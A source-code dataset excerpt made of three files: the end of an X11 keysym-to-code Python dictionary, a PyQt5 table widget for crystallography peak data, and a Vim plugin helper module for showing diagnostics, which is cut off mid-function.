'Hangul_Khieuq': 0x0ebb,
'Hangul_Tieut': 0x0ebc,
'Hangul_Phieuf': 0x0ebd,
'Hangul_Hieuh': 0x0ebe,
'Hangul_A': 0x0ebf,
'Hangul_AE': 0x0ec0,
'Hangul_YA': 0x0ec1,
'Hangul_YAE': 0x0ec2,
'Hangul_EO': 0x0ec3,
'Hangul_E': 0x0ec4,
'Hangul_YEO': 0x0ec5,
'Hangul_YE': 0x0ec6,
'Hangul_O': 0x0ec7,
'Hangul_WA': 0x0ec8,
'Hangul_WAE': 0x0ec9,
'Hangul_OE': 0x0eca,
'Hangul_YO': 0x0ecb,
'Hangul_U': 0x0ecc,
'Hangul_WEO': 0x0ecd,
'Hangul_WE': 0x0ece,
'Hangul_WI': 0x0ecf,
'Hangul_YU': 0x0ed0,
'Hangul_EU': 0x0ed1,
'Hangul_YI': 0x0ed2,
'Hangul_I': 0x0ed3,
'Hangul_J_Kiyeog': 0x0ed4,
'Hangul_J_SsangKiyeog': 0x0ed5,
'Hangul_J_KiyeogSios': 0x0ed6,
'Hangul_J_Nieun': 0x0ed7,
'Hangul_J_NieunJieuj': 0x0ed8,
'Hangul_J_NieunHieuh': 0x0ed9,
'Hangul_J_Dikeud': 0x0eda,
'Hangul_J_Rieul': 0x0edb,
'Hangul_J_RieulKiyeog': 0x0edc,
'Hangul_J_RieulMieum': 0x0edd,
'Hangul_J_RieulPieub': 0x0ede,
'Hangul_J_RieulSios': 0x0edf,
'Hangul_J_RieulTieut': 0x0ee0,
'Hangul_J_RieulPhieuf': 0x0ee1,
'Hangul_J_RieulHieuh': 0x0ee2,
'Hangul_J_Mieum': 0x0ee3,
'Hangul_J_Pieub': 0x0ee4,
'Hangul_J_PieubSios': 0x0ee5,
'Hangul_J_Sios': 0x0ee6,
'Hangul_J_SsangSios': 0x0ee7,
'Hangul_J_Ieung': 0x0ee8,
'Hangul_J_Jieuj': 0x0ee9,
'Hangul_J_Cieuc': 0x0eea,
'Hangul_J_Khieuq': 0x0eeb,
'Hangul_J_Tieut': 0x0eec,
'Hangul_J_Phieuf': 0x0eed,
'Hangul_J_Hieuh': 0x0eee,
'Hangul_RieulYeorinHieuh': 0x0eef,
'Hangul_SunkyeongeumMieum': 0x0ef0,
'Hangul_SunkyeongeumPieub': 0x0ef1,
'Hangul_PanSios': 0x0ef2,
'Hangul_KkogjiDalrinIeung': 0x0ef3,
'Hangul_SunkyeongeumPhieuf': 0x0ef4,
'Hangul_YeorinHieuh': 0x0ef5,
'Hangul_AraeA': 0x0ef6,
'Hangul_AraeAE': 0x0ef7,
'Hangul_J_PanSios': 0x0ef8,
'Hangul_J_KkogjiDalrinIeung': 0x0ef9,
'Hangul_J_YeorinHieuh': 0x0efa,
'Korean_Won': 0x0eff,
'Armenian_ligature_ew': 0x1000587,
'Armenian_full_stop': 0x1000589,
'Armenian_verjaket': 0x1000589,
'Armenian_separation_mark': 0x100055d,
'Armenian_but': 0x100055d,
'Armenian_hyphen': 0x100058a,
'Armenian_yentamna': 0x100058a,
'Armenian_exclam': 0x100055c,
'Armenian_amanak': 0x100055c,
'Armenian_accent': 0x100055b,
'Armenian_shesht': 0x100055b,
'Armenian_question': 0x100055e,
'Armenian_paruyk': 0x100055e,
'Armenian_AYB': 0x1000531,
'Armenian_ayb': 0x1000561,
'Armenian_BEN': 0x1000532,
'Armenian_ben': 0x1000562,
'Armenian_GIM': 0x1000533,
'Armenian_gim': 0x1000563,
'Armenian_DA': 0x1000534,
'Armenian_da': 0x1000564,
'Armenian_YECH': 0x1000535,
'Armenian_yech': 0x1000565,
'Armenian_ZA': 0x1000536,
'Armenian_za': 0x1000566,
'Armenian_E': 0x1000537,
'Armenian_e': 0x1000567,
'Armenian_AT': 0x1000538,
'Armenian_at': 0x1000568,
'Armenian_TO': 0x1000539,
'Armenian_to': 0x1000569,
'Armenian_ZHE': 0x100053a,
'Armenian_zhe': 0x100056a,
'Armenian_INI': 0x100053b,
'Armenian_ini': 0x100056b,
'Armenian_LYUN': 0x100053c,
'Armenian_lyun': 0x100056c,
'Armenian_KHE': 0x100053d,
'Armenian_khe': 0x100056d,
'Armenian_TSA': 0x100053e,
'Armenian_tsa': 0x100056e,
'Armenian_KEN': 0x100053f,
'Armenian_ken': 0x100056f,
'Armenian_HO': 0x1000540,
'Armenian_ho': 0x1000570,
'Armenian_DZA': 0x1000541,
'Armenian_dza': 0x1000571,
'Armenian_GHAT': 0x1000542,
'Armenian_ghat': 0x1000572,
'Armenian_TCHE': 0x1000543,
'Armenian_tche': 0x1000573,
'Armenian_MEN': 0x1000544,
'Armenian_men': 0x1000574,
'Armenian_HI': 0x1000545,
'Armenian_hi': 0x1000575,
'Armenian_NU': 0x1000546,
'Armenian_nu': 0x1000576,
'Armenian_SHA': 0x1000547,
'Armenian_sha': 0x1000577,
'Armenian_VO': 0x1000548,
'Armenian_vo': 0x1000578,
'Armenian_CHA': 0x1000549,
'Armenian_cha': 0x1000579,
'Armenian_PE': 0x100054a,
'Armenian_pe': 0x100057a,
'Armenian_JE': 0x100054b,
'Armenian_je': 0x100057b,
'Armenian_RA': 0x100054c,
'Armenian_ra': 0x100057c,
'Armenian_SE': 0x100054d,
'Armenian_se': 0x100057d,
'Armenian_VEV': 0x100054e,
'Armenian_vev': 0x100057e,
'Armenian_TYUN': 0x100054f,
'Armenian_tyun': 0x100057f,
'Armenian_RE': 0x1000550,
'Armenian_re': 0x1000580,
'Armenian_TSO': 0x1000551,
'Armenian_tso': 0x1000581,
'Armenian_VYUN': 0x1000552,
'Armenian_vyun': 0x1000582,
'Armenian_PYUR': 0x1000553,
'Armenian_pyur': 0x1000583,
'Armenian_KE': 0x1000554,
'Armenian_ke': 0x1000584,
'Armenian_O': 0x1000555,
'Armenian_o': 0x1000585,
'Armenian_FE': 0x1000556,
'Armenian_fe': 0x1000586,
'Armenian_apostrophe': 0x100055a,
'Georgian_an': 0x10010d0,
'Georgian_ban': 0x10010d1,
'Georgian_gan': 0x10010d2,
'Georgian_don': 0x10010d3,
'Georgian_en': 0x10010d4,
'Georgian_vin': 0x10010d5,
'Georgian_zen': 0x10010d6,
'Georgian_tan': 0x10010d7,
'Georgian_in': 0x10010d8,
'Georgian_kan': 0x10010d9,
'Georgian_las': 0x10010da,
'Georgian_man': 0x10010db,
'Georgian_nar': 0x10010dc,
'Georgian_on': 0x10010dd,
'Georgian_par': 0x10010de,
'Georgian_zhar': 0x10010df,
'Georgian_rae': 0x10010e0,
'Georgian_san': 0x10010e1,
'Georgian_tar': 0x10010e2,
'Georgian_un': 0x10010e3,
'Georgian_phar': 0x10010e4,
'Georgian_khar': 0x10010e5,
'Georgian_ghan': 0x10010e6,
'Georgian_qar': 0x10010e7,
'Georgian_shin': 0x10010e8,
'Georgian_chin': 0x10010e9,
'Georgian_can': 0x10010ea,
'Georgian_jil': 0x10010eb,
'Georgian_cil': 0x10010ec,
'Georgian_char': 0x10010ed,
'Georgian_xan': 0x10010ee,
'Georgian_jhan': 0x10010ef,
'Georgian_hae': 0x10010f0,
'Georgian_he': 0x10010f1,
'Georgian_hie': 0x10010f2,
'Georgian_we': 0x10010f3,
'Georgian_har': 0x10010f4,
'Georgian_hoe': 0x10010f5,
'Georgian_fi': 0x10010f6,
'Xabovedot': 0x1001e8a,
'Ibreve': 0x100012c,
'Zstroke': 0x10001b5,
'Gcaron': 0x10001e6,
'Ocaron': 0x10001d1,
'Obarred': 0x100019f,
'xabovedot': 0x1001e8b,
'ibreve': 0x100012d,
'zstroke': 0x10001b6,
'gcaron': 0x10001e7,
'ocaron': 0x10001d2,
'obarred': 0x1000275,
'SCHWA': 0x100018f,
'schwa': 0x1000259,
'Lbelowdot': 0x1001e36,
'lbelowdot': 0x1001e37,
'Abelowdot': 0x1001ea0,
'abelowdot': 0x1001ea1,
'Ahook': 0x1001ea2,
'ahook': 0x1001ea3,
'Acircumflexacute': 0x1001ea4,
'acircumflexacute': 0x1001ea5,
'Acircumflexgrave': 0x1001ea6,
'acircumflexgrave': 0x1001ea7,
'Acircumflexhook': 0x1001ea8,
'acircumflexhook': 0x1001ea9,
'Acircumflextilde': 0x1001eaa,
'acircumflextilde': 0x1001eab,
'Acircumflexbelowdot': 0x1001eac,
'acircumflexbelowdot': 0x1001ead,
'Abreveacute': 0x1001eae,
'abreveacute': 0x1001eaf,
'Abrevegrave': 0x1001eb0,
'abrevegrave': 0x1001eb1,
'Abrevehook': 0x1001eb2,
'abrevehook': 0x1001eb3,
'Abrevetilde': 0x1001eb4,
'abrevetilde': 0x1001eb5,
'Abrevebelowdot': 0x1001eb6,
'abrevebelowdot': 0x1001eb7,
'Ebelowdot': 0x1001eb8,
'ebelowdot': 0x1001eb9,
'Ehook': 0x1001eba,
'ehook': 0x1001ebb,
'Etilde': 0x1001ebc,
'etilde': 0x1001ebd,
'Ecircumflexacute': 0x1001ebe,
'ecircumflexacute': 0x1001ebf,
'Ecircumflexgrave': 0x1001ec0,
'ecircumflexgrave': 0x1001ec1,
'Ecircumflexhook': 0x1001ec2,
'ecircumflexhook': 0x1001ec3,
'Ecircumflextilde': 0x1001ec4,
'ecircumflextilde': 0x1001ec5,
'Ecircumflexbelowdot': 0x1001ec6,
'ecircumflexbelowdot': 0x1001ec7,
'Ihook': 0x1001ec8,
'ihook': 0x1001ec9,
'Ibelowdot': 0x1001eca,
'ibelowdot': 0x1001ecb,
'Obelowdot': 0x1001ecc,
'obelowdot': 0x1001ecd,
'Ohook': 0x1001ece,
'ohook': 0x1001ecf,
'Ocircumflexacute': 0x1001ed0,
'ocircumflexacute': 0x1001ed1,
'Ocircumflexgrave': 0x1001ed2,
'ocircumflexgrave': 0x1001ed3,
'Ocircumflexhook': 0x1001ed4,
'ocircumflexhook': 0x1001ed5,
'Ocircumflextilde': 0x1001ed6,
'ocircumflextilde': 0x1001ed7,
'Ocircumflexbelowdot': 0x1001ed8,
'ocircumflexbelowdot': 0x1001ed9,
'Ohornacute': 0x1001eda,
'ohornacute': 0x1001edb,
'Ohorngrave': 0x1001edc,
'ohorngrave': 0x1001edd,
'Ohornhook': 0x1001ede,
'ohornhook': 0x1001edf,
'Ohorntilde': 0x1001ee0,
'ohorntilde': 0x1001ee1,
'Ohornbelowdot': 0x1001ee2,
'ohornbelowdot': 0x1001ee3,
'Ubelowdot': 0x1001ee4,
'ubelowdot': 0x1001ee5,
'Uhook': 0x1001ee6,
'uhook': 0x1001ee7,
'Uhornacute': 0x1001ee8,
'uhornacute': 0x1001ee9,
'Uhorngrave': 0x1001eea,
'uhorngrave': 0x1001eeb,
'Uhornhook': 0x1001eec,
'uhornhook': 0x1001eed,
'Uhorntilde': 0x1001eee,
'uhorntilde': 0x1001eef,
'Uhornbelowdot': 0x1001ef0,
'uhornbelowdot': 0x1001ef1,
'Ybelowdot': 0x1001ef4,
'ybelowdot': 0x1001ef5,
'Yhook': 0x1001ef6,
'yhook': 0x1001ef7,
'Ytilde': 0x1001ef8,
'ytilde': 0x1001ef9,
'Ohorn': 0x10001a0,
'ohorn': 0x10001a1,
'Uhorn': 0x10001af,
'uhorn': 0x10001b0,
'EcuSign': 0x10020a0,
'ColonSign': 0x10020a1,
'CruzeiroSign': 0x10020a2,
'FFrancSign': 0x10020a3,
'LiraSign': 0x10020a4,
'MillSign': 0x10020a5,
'NairaSign': 0x10020a6,
'PesetaSign': 0x10020a7,
'RupeeSign': 0x10020a8,
'WonSign': 0x10020a9,
'NewSheqelSign': 0x10020aa,
'DongSign': 0x10020ab,
'EuroSign': 0x20ac,
'zerosuperior': 0x1002070,
'foursuperior': 0x1002074,
'fivesuperior': 0x1002075,
'sixsuperior': 0x1002076,
'sevensuperior': 0x1002077,
'eightsuperior': 0x1002078,
'ninesuperior': 0x1002079,
'zerosubscript': 0x1002080,
'onesubscript': 0x1002081,
'twosubscript': 0x1002082,
'threesubscript': 0x1002083,
'foursubscript': 0x1002084,
'fivesubscript': 0x1002085,
'sixsubscript': 0x1002086,
'sevensubscript': 0x1002087,
'eightsubscript': 0x1002088,
'ninesubscript': 0x1002089,
'partdifferential': 0x1002202,
'emptyset': 0x1002205,
'elementof': 0x1002208,
'notelementof': 0x1002209,
'containsas': 0x100220B,
'squareroot': 0x100221A,
'cuberoot': 0x100221B,
'fourthroot': 0x100221C,
'dintegral': 0x100222C,
'tintegral': 0x100222D,
'because': 0x1002235,
'approxeq': 0x1002248,
'notapproxeq': 0x1002247,
'notidentical': 0x1002262,
'stricteq': 0x1002263,
'braille_dot_1': 0xfff1,
'braille_dot_2': 0xfff2,
'braille_dot_3': 0xfff3,
'braille_dot_4': 0xfff4,
'braille_dot_5': 0xfff5,
'braille_dot_6': 0xfff6,
'braille_dot_7': 0xfff7,
'braille_dot_8': 0xfff8,
'braille_dot_9': 0xfff9,
'braille_dot_10': 0xfffa,
'braille_blank': 0x1002800,
'braille_dots_1': 0x1002801,
'braille_dots_2': 0x1002802,
'braille_dots_12': 0x1002803,
'braille_dots_3': 0x1002804,
'braille_dots_13': 0x1002805,
'braille_dots_23': 0x1002806,
'braille_dots_123': 0x1002807,
'braille_dots_4': 0x1002808,
'braille_dots_14': 0x1002809,
'braille_dots_24': 0x100280a,
'braille_dots_124': 0x100280b,
'braille_dots_34': 0x100280c,
'braille_dots_134': 0x100280d,
'braille_dots_234': 0x100280e,
'braille_dots_1234': 0x100280f,
'braille_dots_5': 0x1002810,
'braille_dots_15': 0x1002811,
'braille_dots_25': 0x1002812,
'braille_dots_125': 0x1002813,
'braille_dots_35': 0x1002814,
'braille_dots_135': 0x1002815,
'braille_dots_235': 0x1002816,
'braille_dots_1235': 0x1002817,
'braille_dots_45': 0x1002818,
'braille_dots_145': 0x1002819,
'braille_dots_245': 0x100281a,
'braille_dots_1245': 0x100281b,
'braille_dots_345': 0x100281c,
'braille_dots_1345': 0x100281d,
'braille_dots_2345': 0x100281e,
'braille_dots_12345': 0x100281f,
'braille_dots_6': 0x1002820,
'braille_dots_16': 0x1002821,
'braille_dots_26': 0x1002822,
'braille_dots_126': 0x1002823,
'braille_dots_36': 0x1002824,
'braille_dots_136': 0x1002825,
'braille_dots_236': 0x1002826,
'braille_dots_1236': 0x1002827,
'braille_dots_46': 0x1002828,
'braille_dots_146': 0x1002829,
'braille_dots_246': 0x100282a,
'braille_dots_1246': 0x100282b,
'braille_dots_346': 0x100282c,
'braille_dots_1346': 0x100282d,
'braille_dots_2346': 0x100282e,
'braille_dots_12346': 0x100282f,
'braille_dots_56': 0x1002830,
'braille_dots_156': 0x1002831,
'braille_dots_256': 0x1002832,
'braille_dots_1256': 0x1002833,
'braille_dots_356': 0x1002834,
'braille_dots_1356': 0x1002835,
'braille_dots_2356': 0x1002836,
'braille_dots_12356': 0x1002837,
'braille_dots_456': 0x1002838,
'braille_dots_1456': 0x1002839,
'braille_dots_2456': 0x100283a,
'braille_dots_12456': 0x100283b,
'braille_dots_3456': 0x100283c,
'braille_dots_13456': 0x100283d,
'braille_dots_23456': 0x100283e,
'braille_dots_123456': 0x100283f,
'braille_dots_7': 0x1002840,
'braille_dots_17': 0x1002841,
'braille_dots_27': 0x1002842,
'braille_dots_127': 0x1002843,
'braille_dots_37': 0x1002844,
'braille_dots_137': 0x1002845,
'braille_dots_237': 0x1002846,
'braille_dots_1237': 0x1002847,
'braille_dots_47': 0x1002848,
'braille_dots_147': 0x1002849,
'braille_dots_247': 0x100284a,
'braille_dots_1247': 0x100284b,
'braille_dots_347': 0x100284c,
'braille_dots_1347': 0x100284d,
'braille_dots_2347': 0x100284e,
'braille_dots_12347': 0x100284f,
'braille_dots_57': 0x1002850,
'braille_dots_157': 0x1002851,
'braille_dots_257': 0x1002852,
'braille_dots_1257': 0x1002853,
'braille_dots_357': 0x1002854,
'braille_dots_1357': 0x1002855,
'braille_dots_2357': 0x1002856,
'braille_dots_12357': 0x1002857,
'braille_dots_457': 0x1002858,
'braille_dots_1457': 0x1002859,
'braille_dots_2457': 0x100285a,
'braille_dots_12457': 0x100285b,
'braille_dots_3457': 0x100285c,
'braille_dots_13457': 0x100285d,
'braille_dots_23457': 0x100285e,
'braille_dots_123457': 0x100285f,
'braille_dots_67': 0x1002860,
'braille_dots_167': 0x1002861,
'braille_dots_267': 0x1002862,
'braille_dots_1267': 0x1002863,
'braille_dots_367': 0x1002864,
'braille_dots_1367': 0x1002865,
'braille_dots_2367': 0x1002866,
'braille_dots_12367': 0x1002867,
'braille_dots_467': 0x1002868,
'braille_dots_1467': 0x1002869,
'braille_dots_2467': 0x100286a,
'braille_dots_12467': 0x100286b,
'braille_dots_3467': 0x100286c,
'braille_dots_13467': 0x100286d,
'braille_dots_23467': 0x100286e,
'braille_dots_123467': 0x100286f,
'braille_dots_567': 0x1002870,
'braille_dots_1567': 0x1002871,
'braille_dots_2567': 0x1002872,
'braille_dots_12567': 0x1002873,
'braille_dots_3567': 0x1002874,
'braille_dots_13567': 0x1002875,
'braille_dots_23567': 0x1002876,
'braille_dots_123567': 0x1002877,
'braille_dots_4567': 0x1002878,
'braille_dots_14567': 0x1002879,
'braille_dots_24567': 0x100287a,
'braille_dots_124567': 0x100287b,
'braille_dots_34567': 0x100287c,
'braille_dots_134567': 0x100287d,
'braille_dots_234567': 0x100287e,
'braille_dots_1234567': 0x100287f,
'braille_dots_8': 0x1002880,
'braille_dots_18': 0x1002881,
'braille_dots_28': 0x1002882,
'braille_dots_128': 0x1002883,
'braille_dots_38': 0x1002884,
'braille_dots_138': 0x1002885,
'braille_dots_238': 0x1002886,
'braille_dots_1238': 0x1002887,
'braille_dots_48': 0x1002888,
'braille_dots_148': 0x1002889,
'braille_dots_248': 0x100288a,
'braille_dots_1248': 0x100288b,
'braille_dots_348': 0x100288c,
'braille_dots_1348': 0x100288d,
'braille_dots_2348': 0x100288e,
'braille_dots_12348': 0x100288f,
'braille_dots_58': 0x1002890,
'braille_dots_158': 0x1002891,
'braille_dots_258': 0x1002892,
'braille_dots_1258': 0x1002893,
'braille_dots_358': 0x1002894,
'braille_dots_1358': 0x1002895,
'braille_dots_2358': 0x1002896,
'braille_dots_12358': 0x1002897,
'braille_dots_458': 0x1002898,
'braille_dots_1458': 0x1002899,
'braille_dots_2458': 0x100289a,
'braille_dots_12458': 0x100289b,
'braille_dots_3458': 0x100289c,
'braille_dots_13458': 0x100289d,
'braille_dots_23458': 0x100289e,
'braille_dots_123458': 0x100289f,
'braille_dots_68': 0x10028a0,
'braille_dots_168': 0x10028a1,
'braille_dots_268': 0x10028a2,
'braille_dots_1268': 0x10028a3,
'braille_dots_368': 0x10028a4,
'braille_dots_1368': 0x10028a5,
'braille_dots_2368': 0x10028a6,
'braille_dots_12368': 0x10028a7,
'braille_dots_468': 0x10028a8,
'braille_dots_1468': 0x10028a9,
'braille_dots_2468': 0x10028aa,
'braille_dots_12468': 0x10028ab,
'braille_dots_3468': 0x10028ac,
'braille_dots_13468': 0x10028ad,
'braille_dots_23468': 0x10028ae,
'braille_dots_123468': 0x10028af,
'braille_dots_568': 0x10028b0,
'braille_dots_1568': 0x10028b1,
'braille_dots_2568': 0x10028b2,
'braille_dots_12568': 0x10028b3,
'braille_dots_3568': 0x10028b4,
'braille_dots_13568': 0x10028b5,
'braille_dots_23568': 0x10028b6,
'braille_dots_123568': 0x10028b7,
'braille_dots_4568': 0x10028b8,
'braille_dots_14568': 0x10028b9,
'braille_dots_24568': 0x10028ba,
'braille_dots_124568': 0x10028bb,
'braille_dots_34568': 0x10028bc,
'braille_dots_134568': 0x10028bd,
'braille_dots_234568': 0x10028be,
'braille_dots_1234568': 0x10028bf,
'braille_dots_78': 0x10028c0,
'braille_dots_178': 0x10028c1,
'braille_dots_278': 0x10028c2,
'braille_dots_1278': 0x10028c3,
'braille_dots_378': 0x10028c4,
'braille_dots_1378': 0x10028c5,
'braille_dots_2378': 0x10028c6,
'braille_dots_12378': 0x10028c7,
'braille_dots_478': 0x10028c8,
'braille_dots_1478': 0x10028c9,
'braille_dots_2478': 0x10028ca,
'braille_dots_12478': 0x10028cb,
'braille_dots_3478': 0x10028cc,
'braille_dots_13478': 0x10028cd,
'braille_dots_23478': 0x10028ce,
'braille_dots_123478': 0x10028cf,
'braille_dots_578': 0x10028d0,
'braille_dots_1578': 0x10028d1,
'braille_dots_2578': 0x10028d2,
'braille_dots_12578': 0x10028d3,
'braille_dots_3578': 0x10028d4,
'braille_dots_13578': 0x10028d5,
'braille_dots_23578': 0x10028d6,
'braille_dots_123578': 0x10028d7,
'braille_dots_4578': 0x10028d8,
'braille_dots_14578': 0x10028d9,
'braille_dots_24578': 0x10028da,
'braille_dots_124578': 0x10028db,
'braille_dots_34578': 0x10028dc,
'braille_dots_134578': 0x10028dd,
'braille_dots_234578': 0x10028de,
'braille_dots_1234578': 0x10028df,
'braille_dots_678': 0x10028e0,
'braille_dots_1678': 0x10028e1,
'braille_dots_2678': 0x10028e2,
'braille_dots_12678': 0x10028e3,
'braille_dots_3678': 0x10028e4,
'braille_dots_13678': 0x10028e5,
'braille_dots_23678': 0x10028e6,
'braille_dots_123678': 0x10028e7,
'braille_dots_4678': 0x10028e8,
'braille_dots_14678': 0x10028e9,
'braille_dots_24678': 0x10028ea,
'braille_dots_124678': 0x10028eb,
'braille_dots_34678': 0x10028ec,
'braille_dots_134678': 0x10028ed,
'braille_dots_234678': 0x10028ee,
'braille_dots_1234678': 0x10028ef,
'braille_dots_5678': 0x10028f0,
'braille_dots_15678': 0x10028f1,
'braille_dots_25678': 0x10028f2,
'braille_dots_125678': 0x10028f3,
'braille_dots_35678': 0x10028f4,
'braille_dots_135678': 0x10028f5,
'braille_dots_235678': 0x10028f6,
'braille_dots_1235678': 0x10028f7,
'braille_dots_45678': 0x10028f8,
'braille_dots_145678': 0x10028f9,
'braille_dots_245678': 0x10028fa,
'braille_dots_1245678': 0x10028fb,
'braille_dots_345678': 0x10028fc,
'braille_dots_1345678': 0x10028fd,
'braille_dots_2345678': 0x10028fe,
'braille_dots_12345678': 0x10028ff,
}
| mit | -1,670,757,064,279,498,500 | 27.248759 | 42 | 0.617422 | false |
comptech/atrex | Software/myPeakTableWidget.py | 1 | 3328 |
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.uic import *
from myPeaks import *
from myDetector import *
from peakEditDlg import *
class myPeakTableWidget (QTableWidget) :
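    """QTableWidget subclass listing diffraction peaks, one row per peak.
    Columns show the peak number, H/K/L, 1/len(XYZ), two-theta, Gonio[5]
    and nu; double-clicking a row opens peakEditDlg for that peak.
    """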
numPeaks = 0
#headList = QString("Num;H;K;L;len(XYZ)^-1;2-theta;Gonio[5];nu").split(";")
headList = ['Num','H','K','L','len(xyz)^-1','2-theta','Gonio[5]','nu']
myDet = 0
peaks = 0
imname =''
numPeaks = 0
def __init__(self, parent=None) :
QTableWidget.__init__(self, parent)
hhead = QHeaderView (Qt.Horizontal)
hhead.setVisible(False)
self.setHorizontalHeader (hhead)
self.setColumnCount (8)
self.setRowCount(8)
#self.setHorizontalHeader (hhead)
# peak table widget
#hhead.setVisible(True)
self.setHorizontalHeaderLabels(self.headList)
#for i in range(8) :
#for j in range(8) :
#newItem = QTableWidgetItem("%d %d"%(j,i))
#self.setItem(i, j, newItem)
self.setSelectionBehavior (QAbstractItemView.SelectRows)
self.cellDoubleClicked.connect (self.peakEdit)
def setImageFileName (self, imname) :
self.imfile = imname
def setDetector (self, det) :
self.myDet = det
def setPeaks (self, peaks) :
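        """Populate the table from 'peaks': one row per peak with its
        index, HKL, 1/len(XYZ), two-theta, Gonio[5] and nu values."""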
self.peaks = peaks
count = 0
self.setRowCount (len(peaks))
for p in peaks :
# redo this to match IDL routine
str = '%d'%count
self.setItem (count, 0, QTableWidgetItem(str))
str = '%d'%p.HKL[0]
self.setItem (count, 1, QTableWidgetItem(str))
str = '%d'%p.HKL[1]
self.setItem (count, 2, QTableWidgetItem(str))
str = '%d'%p.HKL[2]
self.setItem (count, 3, QTableWidgetItem(str))
val = vlength (p.XYZ)
xy = p.DetXY
str = '%.2f'%(1./val)
self.setItem (count, 4, QTableWidgetItem(str))
str = '%.2f'%p.tth
self.setItem (count, 5, QTableWidgetItem(str))
#tthval = self.myDet.calculate_tth_from_pixels(xy, self.myDet.gonio)
# xyz = self.myDet.calculate_xyz_from_pixels (xy, self.myDet.gonio)
str = '%.3f'%p.Gonio[5]
self.setItem (count, 6, QTableWidgetItem(str))
str = '%.3f'%p.nu
self.setItem (count, 7, QTableWidgetItem(str))
count = count + 1
self.numPeaks = count
self.resizeColumnsToContents()
    def addPeak (self, peak) :
        # grow the table if needed so the new row actually exists before setItem
        if self.numPeaks >= self.rowCount() :
            self.setRowCount (self.numPeaks + 1)
        xy = peak.DetXY
str = '%d'%xy[0]
self.setItem (self.numPeaks, 0, QTableWidgetItem(str))
str = '%d'%xy[1]
self.setItem (self.numPeaks, 1, QTableWidgetItem(str))
tthval = self.myDet.calculate_tth_from_pixels(xy, self.myDet.gonio)
str = '%f'%tthval
self.setItem (self.numPeaks, 2, QTableWidgetItem(str))
self.numPeaks += 1
""" peakEdit
method called by dbl clicking of the peakTableWidget item
will open a dialog to further edit the peak parameters
"""
def peakEdit (self, row, col):
#open peakEditDlg
curpeak = self.peaks[row]
pedit_dlg = peakEditDlg (curpeak, row)
pedit_dlg.setImageFile (self.imfile)
pedit_dlg.exec_()
| lgpl-3.0 | -1,797,646,228,205,733,000 | 31.627451 | 80 | 0.574219 | false |
Chilledheart/windycode | python/vimsupport.py | 1 | 6475 | #!/usr/bin/env python
import vim
import os
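# Helper layer over Vim's Python API (the vim module above is only available
# when this file runs inside Vim): wrappers around vim.eval()/vim.command()
# for cursor/buffer access, quickfix lists, signs and syntax matches used to
# display diagnostics.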
# Given an object, returns a str object that's utf-8 encoded.
def ToUtf8IfNeeded(value):
if isinstance(value, unicode):
return value.encode('utf8')
if isinstance(value, str):
return value
return str(value)
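# e.g. ToUtf8IfNeeded(u'caf\xe9') -> 'caf\xc3\xa9', ToUtf8IfNeeded(3) -> '3'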
def PresentYesOrNoDialog(message):
return int(vim.eval('confirm("%s", "&Yes\n&No")' % message)) == 1;
def CurrentLineAndColumn():
"""Returns the 0-based current line and 0-based current column."""
# See the comment in CurrentColumn about the calculation for the line and
# column number
line, column = vim.current.window.cursor
return line, column + 1
def CurrentLine():
return vim.current.line
def CurrentBuffer():
return vim.current.buffer
def CurrentBufferFileName():
file_name = vim.current.buffer.name
  if file_name is None:
EchoMessage('empty buffer name')
return file_name
def CurrentFileTypes():
return vim.eval("&filetype").split('.')
#TODO refine this
def EscapeForVim(text):
return text.replace("'", "''")
def FiletypesForBuffer(buffer_object):
# NOTE: Getting &ft for other buffers only works when the buffer has been
# visited by the user at least once, which is true for modified buffers
return GetBufferOption(buffer_object, 'ft').split('.')
def GetBufferOption(buffer_object, option):
to_eval = 'getbufvar({0}, "&{1}")'.format(buffer_object.number, option)
return GetVariableValue(to_eval)
def GetVariableValue(variable):
return vim.eval(variable)
def GetBoolValue(variable):
return bool(int(vim.eval(variable)))
def GetIntValue(variable):
return int(vim.eval(variable))
def GetBufferNumberForFilename(filename, open_file_if_needed = True):
return GetIntValue(u"bufnr('{0}', {1})".format(
EscapeForVim(os.path.realpath(filename)),
int(open_file_if_needed)))
# clean all signs for existing buffer
# FIXME clean WdcSigns only
def UnplaceAllSigns():
buffer_num = vim.current.buffer.number
vim.command('sign unplace * buffer=%d' % buffer_num)
def PlaceSignForErrorMessage(buffer_num, index, diagnostic):
if diagnostic['severity'] >= 3:
sign_name = 'WdcError'
else:
sign_name = 'WdcWarning'
vim.command('sign place %d line=%d name=%s buffer=%d' % (index, diagnostic['lnum'], sign_name, buffer_num))
def PlaceSignForErrorMessageArray(diagnostics):
buffer_num = vim.current.buffer.number
index = 1
for line_num in diagnostics:
PlaceSignForErrorMessage(buffer_num, index, diagnostics[line_num])
index += 1
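# Convert diagnostic objects into Vim quickfix-list entries: one dict per
# diagnostic carrying bufnr/lnum/col/text/full_text/type/severity.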
def ConvertDiagnosticsToQfList(diagnostics):
retval = []
num = len(diagnostics);
for i in xrange(0, num):
diagnostic = diagnostics[i]
location = diagnostic.location
line = location.line
column = location.column - 1
# when the error is "too many error occurs"
if line == 0 or column == 0:
continue;
retval.append({
'bufnr' : GetBufferNumberForFilename(location.file_name),
'lnum' : line,
'col' : column,
'text' : ToUtf8IfNeeded(diagnostic.spelling),
'full_text' : ToUtf8IfNeeded(diagnostic.full_spelling),
'type' : diagnostic.category,
'valid' : 1,
'severity' : diagnostic.severity
})
return retval
def EchoMessage(text):
for line in str(text).split('\n'):
vim.command('{0} \'{1}\''.format('echom', EscapeForVim(line)))
def EchoText(text):
for line in str(text).split('\n'):
vim.command('{0} \'{1}\''.format('echo', EscapeForVim(line)))
def EchoTextH(text):
for line in str(text).split('\n'):
vim.command('{0} \'{1}\''.format('echoh', EscapeForVim(line)))
def EchoTruncatedText(text):
width = int(vim.eval('&columns')) - 3
if width <= 0:
return
saved_ruler = vim.eval('&ruler')
saved_showcmd = vim.eval('&showcmd')
vim.command('set noruler noshowcmd')
truncated = str(text)[:width]
EchoText(truncated)
  # restore the option values saved above; re-reading &ruler and &showcmd at
  # this point would only capture the values that were just disabled
  vim.command('let &ruler = %s' % saved_ruler)
  vim.command('let &showcmd = %s' % saved_showcmd)
def ClearWdcSyntaxMatches():
matches = vim.eval('getmatches()')
for match in matches:
if match['group'].startswith('Wdc'):
vim.eval('matchdelete({0})'.format(match['id']))
def AddDiagnosticSyntaxMatch(line_num,
column_num,
line_end_num = None,
column_end_num = None,
is_error = True):
group = 'WdcErrorSection' if is_error else 'WdcWarningSection'
if not line_end_num:
line_end_num = line_num
line_num, column_num = LineAndColumnNumbersClamped(line_num, column_num)
